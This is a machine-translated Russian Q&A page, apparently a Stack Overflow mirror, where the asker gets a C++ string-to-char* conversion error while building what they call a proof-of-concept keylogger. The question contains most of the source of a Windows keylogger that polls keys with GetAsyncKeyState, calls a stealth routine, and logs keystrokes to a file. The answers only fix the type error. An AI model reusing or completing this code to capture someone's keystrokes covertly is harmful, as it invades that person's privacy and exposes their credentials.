невозможно преобразовать 'std :: string {aka std :: basic_string <char>}' в 'char *' для аргумента '2' в 'int Save (int, char *)' [duplicate]

0

В настоящее время я работаю над простым кейлоггером, чтобы доказать концепцию. Но я продолжаю получать эту ошибку:

cannot convert 'std::string {aka std::basic_string<char>}' to 'char*' for argument '2' to 'int Save(int, char*)'

И да, я искал вокруг, но никто из них не работал. Я пытаюсь прочитать переменную из текстового файла.

Как это исправить? Код:

int Save (int key_stroke, char *file);
int getFile (string file);
void Stealth();
string fileN;

int main()
{
    ifstream fN("c.txt");
    fN >> fileN;

    Stealth();
    char i;

    while (1)
    {
        for(i = 8; i <= 190; i++)
        {
            if (GetAsyncKeyState(i) == -32767)
                Save (i,fileN);
        }
    }
    system ("PAUSE");
    return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
    if ( (key_stroke == 1) || (key_stroke == 2) )
        return 0;

    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen(file, "a+");

    cout << key_stroke << endl;

    if (key_stroke == 8)
        fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
    else if (key_stroke == 13)
        fprintf(OUTPUT_FILE, "%s", "\n");
    else if (key_stroke == 32)
        fprintf(OUTPUT_FILE, "%s", " ");
    else if (key_stroke == VK_TAB)
        fprintf(OUTPUT_FILE, "%s", "[TAB]");
    else if (key_stroke == VK_SHIFT)
        fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
    else if (key_stroke == VK_CONTROL)
        fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
    else if (key_stroke == VK_ESCAPE)
        fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
    else if (key_stroke == VK_END)
        fprintf(OUTPUT_FILE, "%s", "[END]");
    else if (key_stroke == VK_HOME)
        fprintf(OUTPUT_FILE, "%s", "[HOME]");
    else if (key_stroke == VK_LEFT)
        fprintf(OUTPUT_FILE, "%s", "[LEFT]");
    else if (key_stroke == VK_UP)
        fprintf(OUTPUT_FILE, "%s", "[UP]");
    else if (key_stroke == VK_RIGHT)
        fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
    else if (key_stroke == VK_DOWN)
        fprintf(OUTPUT_FILE, "%s", "[DOWN]");
    else if (key_stroke == 190 || key_stroke == 110)
        fprintf(OUTPUT_FILE, "%s", ".");
    else
        fprintf(OUTPUT_FILE, "%s", &key_stroke);

    fclose (OUTPUT_FILE);
    return 0;
}
  • 0
    Пусть Save принимает const char* , а затем передает ему fileN.c_str() . В связи с этим, почему бы не Save const string& ?
Теги:

2 ответа

0
Лучший ответ

Как говорится в сообщении об ошибке, вы пытаетесь передать std::string в функцию, которая ожидает указатель на массив символов.

Лучшим решением является изменение функции для работы со строкой:

int Save (int key_stroke, const std::string & file);

а затем извлеките указатель, когда вам понадобится один

fopen(file.c_str(), "a+");
          ^^^^^^^^

В качестве альтернативы, если вы хотите сохранить эстетику C-стиля вашего кода, вы можете изменить тип параметра на const char * и передать ему fileN.c_str().

1

Чтобы получить строку стиля C из строки std::string, используйте c_str() члена c_str(). Он вернет завершенный const char *. Однако ваша функция принимает char*. Конечно, вы могли бы const_cast указатель на получение char* но гораздо более разумный подход состоял бы в том, чтобы ваша функция принимала const char* или const std::string& в первую очередь.

Ещё вопросы

Сообщество Overcoder
Наверх
Меню